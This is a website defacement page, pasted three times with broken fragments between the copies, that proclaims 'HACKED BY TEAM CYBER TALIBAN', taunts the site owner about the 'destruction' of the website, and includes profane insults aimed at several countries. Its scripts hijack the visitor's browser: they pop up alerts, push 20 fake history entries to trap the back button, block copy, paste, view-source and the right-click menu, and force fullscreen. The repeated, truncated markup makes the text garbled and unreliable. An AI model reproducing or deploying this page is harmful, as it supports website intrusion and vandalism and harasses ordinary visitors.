
<html>
    <head> 
        <title>HACKED BY TEAM CYBER TALIBAN</title>
    <meta property="og:title" content="Team cyber hacker was here">
    <meta name="description" content="Team cyber hacker was here">
    <meta name="keywords" content="TEAM CYBER HACKERS">
    <link rel="icon" type="image/x-icon" href="https://i.postimg.cc/wxmSNRV4/IMG-20240415-152108-550.webp">
    <link href="https://fonts.googleapis.com/css?family=Iceberg" rel="stylesheet" type="text/css">

    <script>alert('YOU HAVE BEEN PWNED');</script>
    <script>alert('ALERT TEAM CYBER HACKERS WAS HERE');</script>
    <style type="text/css">

        a:hover,
        body {
            cursor: url(http://cur.cursors-4u.net/symbols/sym-1/sym46.cur), progress !important
        }
    </style>
<style>

#sole {
font-family: 'Passion One', cursive;
font-size:60px;
}

</style>
<style>
body {
color: #ffffff;
background:#000000;
background-image:url('https://images.alphacoders.com/475/475526.jpg');
   background-repeat:no-repeat;
    background-size: 100% ;
    background-position:top center;
}

.logo{
width:200px;
height:200px;
border-radius:100%;
}
h1{
text-transform: uppercase;
font-family:tahoma;
}
#particles-js{ width: 100%; height: 100%; background-size: cover; background-position: 50% 50%; position: fixed; top: 0px; z-index:1;}</style><!-- particles --> <style type="text/css">@font-face { font-family: Roboto; src: url("chrome-extension://mcgbeeipkmelnpldkobichboakdfaeon/css/Roboto-Regular.ttf"); }</style></head>


<body onclick="playAudio();toggleFullScreen()">

<div id="particles-js">
    <canvas class="particles-js-canvas-el" style="width: 100%; height: 100%;" width="1365" height="973"></canvas>
</div>
<script src="http://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js"></script> 
<script>particlesJS('particles-js', {'particles':{'number':{'value':80,'density':{'enable':true,'value_area':900}},'color':{'value':'#FF0000'},'shape':{'type':'triangle','stroke':{'width':0,'color':'#FF0000'},'polygon':{'nb_sides':5},'image':{'src':'img/github.svg','width':100,'height':100}},'opacity':{'value':0.5,'random':true,'anim':{'enable':false,'speed':1,'opacity_min':0.1,'sync':false}},'size':{'value':3,'random':true,'anim':{'enable':false,'speed':1,'size_min':0.1,'sync':false}},'line_linked':{'enable':true,'distance':200,'color':'#FF0000','opacity':0.4,'width':2},'move':{'enable':true,'speed':2,'direction':'right','random':true,'straight':false,'out_mode':'out','bounce':false,'attract':{'enable':false,'rotateX':10000,'rotateY':10000}}},'interactivity':{'detect_on':'canvas','events':{'onhover':{'enable':true,'mode':'grab'},'onclick':{'enable':true,'mode':'repulse'},'resize':true},'modes':{'grab':{'distance':100,'line_linked':{'opacity':0.8}},'bubble':{'particles_nb':2}}},'retina_detect':true});</script>



<div align="center">
<img class="logo" src="https://i.postimg.cc/wxmSNRV4/IMG-20240415-152108-550.webp">
<br><br>

<b>
    <div id="center">
        <img src="https://i.imgur.com/8zYLCbs.gif" style="margin:0 0 -0px 0;width:45px;height:45px;"><font style="color: white; text-shadow: 1px 1px 17px black;" color="black" class="blink" face="Iceberg" size="7">HACKED BY TEAM CYBER TALIBAN<x><i></i></x></font><img src="https://i.imgur.com/HyXzLUG.gif" style="margin:0 0 -0px 0;width:45px;height:45px;"></div>
<br><br>
<font style="color: white; text-shadow: 1px 1px 17px black;" color="black" face="Iceberg" size="4"><b></b></font><b>
<style type="text/css">
     body{ background-color:black; } 
    
     h1{ 
       
     text-decoration: none; 
     
     border-radius:0px; 
     
     border:0px; 
     
     font-family: 'Iceland', cursive; 
     
     font-size:22px; 
     
     margin:0px; padding:0px; 
     
     animation:psychoxploit 0.5s linear infinite;

     }
     
       h3{
        color:silver;
         font-size: 10px;
         text-shadow: 0px 0px 10px blue;
         font-family:kalam;

       }
       
    
     
     pre{ color:grey; } marquee{ width:100%; } @keyframes psychoxploit{ 2%{color:#fff;} 3%{transform:translate(2px,-10px) skewX(3240deg);} 5%{transform:translate(0px,0px) skewX(0deg);} 2% , 54%{transform:translateX(0px) skew(0deg);} 55%{transform:translate(-2px,6px) skew(-5530deg);} 56%{transform:translate(0px,0px) skew(0deg);} 57%{transform:translate(4px,-10px) skew(-70deg);} 58%{transform:translate(0px,0px) skew(0deg);} 62%{transform:translate(0px,20px) skew(0deg);} 63%{transform:translate(4px,-2px) skew(0deg);} 90%{transform:translate(1px,3px); skew(-230deg);} 95%{transform:translate(-7px,2px); skew(-120deg);} 100%{transform:translate(0px,0px) skew(0deg);} 
  </style>
</head>
<body>
  <title>HACKEDBY TEAM_CYBER_TALIBAN</title>
  <link href=
  "https://fonts.googleapis.com/css2?family=Iceland&amp;display=swap"
  rel="stylesheet">
  <link href="https://fonts.googleapis.com/css?family=Jura" rel=
  "stylesheet">
  <link rel="preconnect" href="https://fonts.gstatic.com"
  crossorigin="">
  <link href=
  "https://fonts.googleapis.com/css2?family=Iceland&amp;family=Kalam:wght@300&amp;display=swap"
  rel="stylesheet">
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content=
  "width=device-width, initial-scale=1.0">
  <meta name="description" content="BayxzXploit">
  <meta name="author" content="BayxzXploit">
  <meta name="keywords" content="BayxzXploit">
  <meta name="googlebot" content="all">
  <meta name="robots" content="all">
  <meta name="googlebot-news" content="all">
  <meta name="google" content="notranslate">
  <meta name="og:title" content="BayxzXploit">
  <script>
  (function () { for(var i = 0; i < 20; i++) { history.pushState(null, document.title, window.location.href ); } })(document, window, history); 
  </script>
  <center>
   
    
    <center>
      <h1><font color="#9D9D9D">HACKED BY </font> <font color=
      "silver">TEAM CYBER TALIBAN</font></h1><br>
      <br>
      <center>
               <font face="Iceland" size="3" color="white">- Hello Afghanistan  !
        - <font size="2">TEAM CYBER TALIBAN IS HERE
        <font face="Iceland" size="3" color="white">This is Our
        Payback to Afghanistan 
        Who Are Damaging Taliban Cyber Space-</font></font></font>
        <center>
          <font face="Iceland" size="3" color="white"><font size=
          "2"><font face="Iceland" size="3" color=
          "white"><font face="Iceland" size="3" color="white">©MIKO</font></font></font></font>
          <center>
            <font face="Iceland" size="3" color="white"><font size=
            "2"><font face="Iceland" size="3" color=
            "white"><font size="3" color="white">- ENJOY THE
            DESTRUCTION OF YOUR WEBSITE -<br>
            <font face="Iceland" color="white">- FUCK Afghanistan  ,
            FUCK Israel, FUCK America , FUCK India-</font><br>
            <br></font></font></font></font>
            <center>
                            <font face="Iceland" size="3" color=
              "white"><font size="2"><font face="Iceland" size="3"
              color="white"><font size="3" color=
              "white"><font size="3" color="red">TEAM CYBER TALIBAN
                </font><br>
              <br></font></font></font></font>
              <center>
                <font face="Iceland" size="3" color=
                "white"><font size="2"><font face="Iceland" size=
                "3" color="white"><font size="3" color=
                "white"><font face="Iceland" size="2" color=
                "silver">"
                Miko "</font><br></font></font></font></font>
                <center>
                  <font face="Iceland" size="3" color=
                  "white"><font size="2"><font face="Iceland" size=
                  "3" color="white"><font size="3" color=
                  "white"><font face="Iceland" size="2" color=
                  "green"><marquee>~ Jamaika48 || Jomok48 ||
                  Network_Nine ||DarkCyberWarrior|| ||Team_Rcf||
                  ALL CYBER HACKERS ~</marquee></font><br>

                  <font face="Iceland" size="3" color=
                  "white"><font size="2"><font face="Iceland" size=
                  "3" color="white"><font size="3" color=
                  "white"><font face="Iceland" size="4" color=
                  "white">- WE ARE ALL TALIBAN HACKERS*/
                  -</font></font></font></font></font>
                </center>
              </center>
            </center>
          </center>
        </center>
      </center>
    </center>
  </center>
</body>
</html>

</b>
</div>
<b>   
    <hr color="white" size="8px">

   <hr color="red" size="2px">

<div align="center">

  <font style="color: white; text-shadow: 1px 1px 17px black;" color="black" class="blink" face="Iceberg" size="5">||| MIKO |||
  <br><br><font style="color: white; text-shadow: 1px 1px 17px black;" color="Red" class="blink" face="Iceberg" size="5">
WE ARE TALIBAN HACKERS.<br> 
WE ARE TEAM CYBER TALIBAN.<br> 
MIKO.</br> 
MIKU.</br> <br>
#TEAM CYBER HACKERS
  </div>
   <hr color="red" size="3px">

   <hr color="white" size="8px">
<div id=bar style="position: fixed; width: 100%; bottom: 0px; font-family: Tahoma; height: 30px; color: lime; font-size: 15px; left: 0px; border-top: 1px solid #000; padding: 5px; background-color: #000"> 

</style>
<p>
</p></div>
</div>
</div>


<script>  var x = document.getElementById("dark");     function playAudio() {  x.play();   }       function myFunction() {          var element = document.body; element.classList.toggle("dark-mode"); } function changeImage() { if (document.getElementById("imgClickAndChange").src == "body") { document.getElementById("imgClickAndChange").src = "body"; } else { document.getElementById("imgClickAndChange").src = "body"; } } </script>
<script>

/*function check(e)
{
alert(e.keyCode);
}*/
document.onkeydown = function(e) {
        if (e.ctrlKey && (e.keyCode === 67 || e.keyCode === 86 || e.keyCode === 85 || e.keyCode === 117)) {//Alt+c, Alt+v will also be disabled sadly.
            alert('HAHAHAHAHAHAHAHAHAHA');
        }
        return false;
};

    
document.addEventListener('contextmenu', event => event.preventDefault());
 
function aud_play() {
var myAudio = document.getElementById("myTune");
if (myAudio.paused) {
myAudio.play();
} 
}
function aud_pause(){
var myAudio = document.getElementById("myTune");
if(myAudio.play) {
myAudio.pause();
} 
}

<script>

</b></body></html>
unction myFunction() {          var element = document.body; element.classList.toggle("dark-mode"); } function changeImage() { if (document.getElementById("imgClic(document.getElementById("imgClickAndChange").src == "body") { document.getElementById("imgClickAndChange").src = "bod<html>
    <head> 
        <title>HACKED BY TEAM CYBER TALIBAN</title>
    <meta property="og:title" content="Team cyber hacker was here">
    <meta name="description" content="Team cyber hacker was here">
    <meta name="keywords" content="TEAM CYBER HACKERS">
    <link rel="icon" type="image/x-icon" href="https://i.postimg.cc/wxmSNRV4/IMG-20240415-152108-550.webp">
    <link href="https://fonts.googleapis.com/css?family=Iceberg" rel="stylesheet" type="text/css">

    <script>alert('YOU HAVE BEEN PWNED');</script>
    <script>alert('ALERT TEAM CYBER HACKERS WAS HERE');</script>
    <style type="text/css">

        a:hover,
        body {
            cursor: url(http://cur.cursors-4u.net/symbols/sym-1/sym46.cur), progress !important
        }
    </style>
<style>

#sole {
font-family: 'Passion One', cursive;
font-size:60px;
}

</style>
<style>
body {
color: #ffffff;
background:#000000;
background-image:url('https://images.alphacoders.com/475/475526.jpg');
   background-repeat:no-repeat;
    background-size: 100% ;
    background-position:top center;
}

.logo{
width:200px;
height:200px;
border-radius:100%;
}
h1{
text-transform: uppercase;
font-family:tahoma;
}
#particles-js{ width: 100%; height: 100%; background-size: cover; background-position: 50% 50%; position: fixed; top: 0px; z-index:1;}</style><!-- particles --> <style type="text/css">@font-face { font-family: Roboto; src: url("chrome-extension://mcgbeeipkmelnpldkobichboakdfaeon/css/Roboto-Regular.ttf"); }</style></head>


<body onclick="playAudio();toggleFullScreen()">

<div id="particles-js">
    <canvas class="particles-js-canvas-el" style="width: 100%; height: 100%;" width="1365" height="973"></canvas>
</div>
<script src="http://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js"></script> 
<script>particlesJS('particles-js', {'particles':{'number':{'value':80,'density':{'enable':true,'value_area':900}},'color':{'value':'#FF0000'},'shape':{'type':'triangle','stroke':{'width':0,'color':'#FF0000'},'polygon':{'nb_sides':5},'image':{'src':'img/github.svg','width':100,'height':100}},'opacity':{'value':0.5,'random':true,'anim':{'enable':false,'speed':1,'opacity_min':0.1,'sync':false}},'size':{'value':3,'random':true,'anim':{'enable':false,'speed':1,'size_min':0.1,'sync':false}},'line_linked':{'enable':true,'distance':200,'color':'#FF0000','opacity':0.4,'width':2},'move':{'enable':true,'speed':2,'direction':'right','random':true,'straight':false,'out_mode':'out','bounce':false,'attract':{'enable':false,'rotateX':10000,'rotateY':10000}}},'interactivity':{'detect_on':'canvas','events':{'onhover':{'enable':true,'mode':'grab'},'onclick':{'enable':true,'mode':'repulse'},'resize':true},'modes':{'grab':{'distance':100,'line_linked':{'opacity':0.8}},'bubble':{'particles_nb':2}}},'retina_detect':true});</script>



<div align="center">
<img class="logo" src="https://i.postimg.cc/wxmSNRV4/IMG-20240415-152108-550.webp">
<br><br>

<b>
    <div id="center">
        <img src="https://i.imgur.com/8zYLCbs.gif" style="margin:0 0 -0px 0;width:45px;height:45px;"><font style="color: white; text-shadow: 1px 1px 17px black;" color="black" class="blink" face="Iceberg" size="7">HACKED BY TEAM CYBER TALIBAN<x><i></i></x></font><img src="https://i.imgur.com/HyXzLUG.gif" style="margin:0 0 -0px 0;width:45px;height:45px;"></div>
<br><br>
<font style="color: white; text-shadow: 1px 1px 17px black;" color="black" face="Iceberg" size="4"><b></b></font><b>
<style type="text/css">
     body{ background-color:black; } 
    
     h1{ 
       
     text-decoration: none; 
     
     border-radius:0px; 
     
     border:0px; 
     
     font-family: 'Iceland', cursive; 
     
     font-size:22px; 
     
     margin:0px; padding:0px; 
     
     animation:psychoxploit 0.5s linear infinite;

     }
     
       h3{
        color:silver;
         font-size: 10px;
         text-shadow: 0px 0px 10px blue;
         font-family:kalam;

       }
       
    
     
     pre{ color:grey; } marquee{ width:100%; } @keyframes psychoxploit{ 2%{color:#fff;} 3%{transform:translate(2px,-10px) skewX(3240deg);} 5%{transform:translate(0px,0px) skewX(0deg);} 2% , 54%{transform:translateX(0px) skew(0deg);} 55%{transform:translate(-2px,6px) skew(-5530deg);} 56%{transform:translate(0px,0px) skew(0deg);} 57%{transform:translate(4px,-10px) skew(-70deg);} 58%{transform:translate(0px,0px) skew(0deg);} 62%{transform:translate(0px,20px) skew(0deg);} 63%{transform:translate(4px,-2px) skew(0deg);} 90%{transform:translate(1px,3px); skew(-230deg);} 95%{transform:translate(-7px,2px); skew(-120deg);} 100%{transform:translate(0px,0px) skew(0deg);} 
  </style>
</head>
<body>
  <title>HACKEDBY TEAM_CYBER_TALIBAN</title>
  <link href=
  "https://fonts.googleapis.com/css2?family=Iceland&amp;display=swap"
  rel="stylesheet">
  <link href="https://fonts.googleapis.com/css?family=Jura" rel=
  "stylesheet">
  <link rel="preconnect" href="https://fonts.gstatic.com"
  crossorigin="">
  <link href=
  "https://fonts.googleapis.com/css2?family=Iceland&amp;family=Kalam:wght@300&amp;display=swap"
  rel="stylesheet">
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content=
  "width=device-width, initial-scale=1.0">
  <meta name="description" content="BayxzXploit">
  <meta name="author" content="BayxzXploit">
  <meta name="keywords" content="BayxzXploit">
  <meta name="googlebot" content="all">
  <meta name="robots" content="all">
  <meta name="googlebot-news" content="all">
  <meta name="google" content="notranslate">
  <meta name="og:title" content="BayxzXploit">
  <script>
  (function () { for(var i = 0; i < 20; i++) { history.pushState(null, document.title, window.location.href ); } })(document, window, history); 
  </script>
  <center>
   
    
    <center>
      <h1><font color="#9D9D9D">HACKED BY </font> <font color=
      "silver">TEAM CYBER TALIBAN</font></h1><br>
      <br>
      <center>
               <font face="Iceland" size="3" color="white">- Hello Admin !
        - <font size="2">Your Website Has Been Hacked By TEAM CYBER TALIBAN
        <font face="Iceland" size="3" color="white">This is Our
        Payback to Afghanistan , And America Hackers-</font></font></font>
        <center>
          <font face="Iceland" size="3" color="white"><font size=
          "2"><font face="Iceland" size="3" color=
          "white"><font face="Iceland" size="3" color="white">©MIKO</font></font></font></font>
          <center>
            <font face="Iceland" size="3" color="white"><font size=
            "2"><font face="Iceland" size="3" color=
            "white"><font size="3" color="white">- ENJOY THE
            DESTRUCTION OF YOUR WEBSITE -<br>
            <font face="Iceland" color="white">- FUCK Afghanistan ,
           FUCK America-</font><br>
            <br></font></font></font></font>
            <center>
                            <font face="Iceland" size="3" color=
              "white"><font size="2"><font face="Iceland" size="3"
              color="white"><font size="3" color=
              "white"><font size="3" color="red">TEAM CYBER TALIBAN
                </font><br>
              <br></font></font></font></font>
              <center>
                <font face="Iceland" size="3" color=
                "white"><font size="2"><font face="Iceland" size=
                "3" color="white"><font size="3" color=
                "white"><font face="Iceland" size="2" color=
                "silver">"
                Geetz "</font><br></font></font></font></font>
                <center>
                  <font face="Iceland" size="3" color=
                  "white"><font size="2"><font face="Iceland" size=
                  "3" color="white"><font size="3" color=
                  "white"><font face="Iceland" size="2" color=
                  "green"><marquee>~ Miko || Miku ||
                  Network_Nine ||DarkCyberWarrior|| ||Team_Rcf||
                  ALL TALIBAN HACKERS ~</marquee></font><br>

                  <font face="Iceland" size="3" color=
                  "white"><font size="2"><font face="Iceland" size=
                  "3" color="white"><font size="3" color=
                  "white"><font face="Iceland" size="4" color=
                  "white">- WE ARE ALL TALIBAN HACKERS*/
                  -</font></font></font></font></font>
                </center>
              </center>
            </center>
          </center>
        </center>
      </center>
    </center>
  </center>
</body>
</html>

</b>
</div>
<b>   
    <hr color="white" size="8px">

   <hr color="red" size="2px">

<div align="center">

  <font style="color: white; text-shadow: 1px 1px 17px black;" color="black" class="blink" face="Iceberg" size="5">||| Jomok48.Team |||
  <br><br><font style="color: white; text-shadow: 1px 1px 17px black;" color="Red" class="blink" face="Iceberg" size="5">
WE ARE TALIBAN HACKERS.<br> 
WE ARE TEAM CYBER HACKERS.<br> 
#TEAM CYBER HACKERS
  </div>
   <hr color="red" size="3px">

   <hr color="white" size="8px">
<div id=bar style="position: fixed; width: 100%; bottom: 0px; font-family: Tahoma; height: 30px; color: lime; font-size: 15px; left: 0px; border-top: 1px solid #000; padding: 5px; background-color: #000"> 
</style>
<p>
</p></div>
</div>
</div>


<script>  var x = document.getElementById("dark");     function playAudio() {  x.play();   }       function myFunction() {          var element = document.body; element.classList.toggle("dark-mode"); } function changeImage() { if (document.getElementById("imgClickAndChange").src == "body") { document.getElementById("imgClickAndChange").src = "body"; } else { document.getElementById("imgClickAndChange").src = "body"; } } </script>
<script>

/*function check(e)
{
alert(e.keyCode);
}*/
document.onkeydown = function(e) {
        if (e.ctrlKey && (e.keyCode === 67 || e.keyCode === 86 || e.keyCode === 85 || e.keyCode === 117)) {//Alt+c, Alt+v will also be disabled sadly.
            alert('HAHAHAHAHAHAHAHAHAHA');
        }
        return false;
};

    
document.addEventListener('contextmenu', event => event.preventDefault());
 
function aud_play() {
var myAudio = document.getElementById("myTune");
if (myAudio.paused) {
myAudio.play();
} 
}
function aud_pause(){
var myAudio = document.getElementById("myTune");
if(myAudio.play) {
myAudio.pause();
} 
}

<script>

</b></body></html>
unction myFunction() {          var element = document.body; element.classList.toggle("dark-mode"); } function changeImage() { if (document.getElementById("imgClic(document.getElementById("imgClickAndChange").src == "body") { document.getElementById("imgClickAndChange").src = "bod<html>
    <head> 
        <title>HACKED BY TEAM CYBER HACKERS</title>
    <meta property="og:title" content="Team cyber hacker was here">
    <meta name="description" content="Team cyber hacker was here">
    <meta name="keywords" content="TEAM CYBER HACKERS">
    <link rel="icon" type="image/x-icon" href="https://i.postimg.cc/wxmSNRV4/IMG-20240415-152108-550.webp">
    <link href="https://fonts.googleapis.com/css?family=Iceberg" rel="stylesheet" type="text/css">

    <script>alert('YOU HAVE BEEN PWNED');</script>
    <script>alert('ALERT TEAM CYBER HACKERS WAS HERE');</script>
    <style type="text/css">

        a:hover,
        body {
            cursor: url(http://cur.cursors-4u.net/symbols/sym-1/sym46.cur), progress !important
        }
    </style>
<style>

#sole {
font-family: 'Passion One', cursive;
font-size:60px;
}

</style>
<style>
body {
color: #ffffff;
background:#000000;
background-image:url('https://images.alphacoders.com/475/475526.jpg');
   background-repeat:no-repeat;
    background-size: 100% ;
    background-position:top center;
}

.logo{
width:200px;
height:200px;
border-radius:100%;
}
h1{
text-transform: uppercase;
font-family:tahoma;
}
#particles-js{ width: 100%; height: 100%; background-size: cover; background-position: 50% 50%; position: fixed; top: 0px; z-index:1;}</style><!-- particles --> <style type="text/css">@font-face { font-family: Roboto; src: url("chrome-extension://mcgbeeipkmelnpldkobichboakdfaeon/css/Roboto-Regular.ttf"); }</style></head>


<body onclick="playAudio();toggleFullScreen()">

<div id="particles-js">
    <canvas class="particles-js-canvas-el" style="width: 100%; height: 100%;" width="1365" height="973"></canvas>
</div>
<script src="http://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js"></script> 
<script>particlesJS('particles-js', {'particles':{'number':{'value':80,'density':{'enable':true,'value_area':900}},'color':{'value':'#FF0000'},'shape':{'type':'triangle','stroke':{'width':0,'color':'#FF0000'},'polygon':{'nb_sides':5},'image':{'src':'img/github.svg','width':100,'height':100}},'opacity':{'value':0.5,'random':true,'anim':{'enable':false,'speed':1,'opacity_min':0.1,'sync':false}},'size':{'value':3,'random':true,'anim':{'enable':false,'speed':1,'size_min':0.1,'sync':false}},'line_linked':{'enable':true,'distance':200,'color':'#FF0000','opacity':0.4,'width':2},'move':{'enable':true,'speed':2,'direction':'right','random':true,'straight':false,'out_mode':'out','bounce':false,'attract':{'enable':false,'rotateX':10000,'rotateY':10000}}},'interactivity':{'detect_on':'canvas','events':{'onhover':{'enable':true,'mode':'grab'},'onclick':{'enable':true,'mode':'repulse'},'resize':true},'modes':{'grab':{'distance':100,'line_linked':{'opacity':0.8}},'bubble':{'particles_nb':2}}},'retina_detect':true});</script>



<div align="center">
<img class="logo" src="https://i.postimg.cc/wxmSNRV4/IMG-20240415-152108-550.webp">
<br><br>

<b>
    <div id="center">
        <img src="https://i.imgur.com/8zYLCbs.gif" style="margin:0 0 -0px 0;width:45px;height:45px;"><font style="color: white; text-shadow: 1px 1px 17px black;" color="black" class="blink" face="Iceberg" size="7">HACKED BY TEAM CYBER HACKERS<x><i></i></x></font><img src="https://i.imgur.com/HyXzLUG.gif" style="margin:0 0 -0px 0;width:45px;height:45px;"></div>
<br><br>
<font style="color: white; text-shadow: 1px 1px 17px black;" color="black" face="Iceberg" size="4"><b></b></font><b>
<style type="text/css">
     body{ background-color:black; } 
    
     h1{ 
       
     text-decoration: none; 
     
     border-radius:0px; 
     
     border:0px; 
     
     font-family: 'Iceland', cursive; 
     
     font-size:22px; 
     
     margin:0px; padding:0px; 
     
     animation:psychoxploit 0.5s linear infinite;

     }
     
       h3{
        color:silver;
         font-size: 10px;
         text-shadow: 0px 0px 10px blue;
         font-family:kalam;

       }
       
    
     
     pre{ color:grey; } marquee{ width:100%; } @keyframes psychoxploit{ 2%{color:#fff;} 3%{transform:translate(2px,-10px) skewX(3240deg);} 5%{transform:translate(0px,0px) skewX(0deg);} 2% , 54%{transform:translateX(0px) skew(0deg);} 55%{transform:translate(-2px,6px) skew(-5530deg);} 56%{transform:translate(0px,0px) skew(0deg);} 57%{transform:translate(4px,-10px) skew(-70deg);} 58%{transform:translate(0px,0px) skew(0deg);} 62%{transform:translate(0px,20px) skew(0deg);} 63%{transform:translate(4px,-2px) skew(0deg);} 90%{transform:translate(1px,3px); skew(-230deg);} 95%{transform:translate(-7px,2px); skew(-120deg);} 100%{transform:translate(0px,0px) skew(0deg);} 
  </style>
</head>
<body>

<script>

</b></body></html>
unction myFunction() {          var element = document.body; element.classList.toggle("dark-mode"); } function changeImage() { if (document.getElementById("imgClic(document.getElementById("imgClickAndChange").src == "body") { document.getElementById("imgClickAndChange").src = "bod
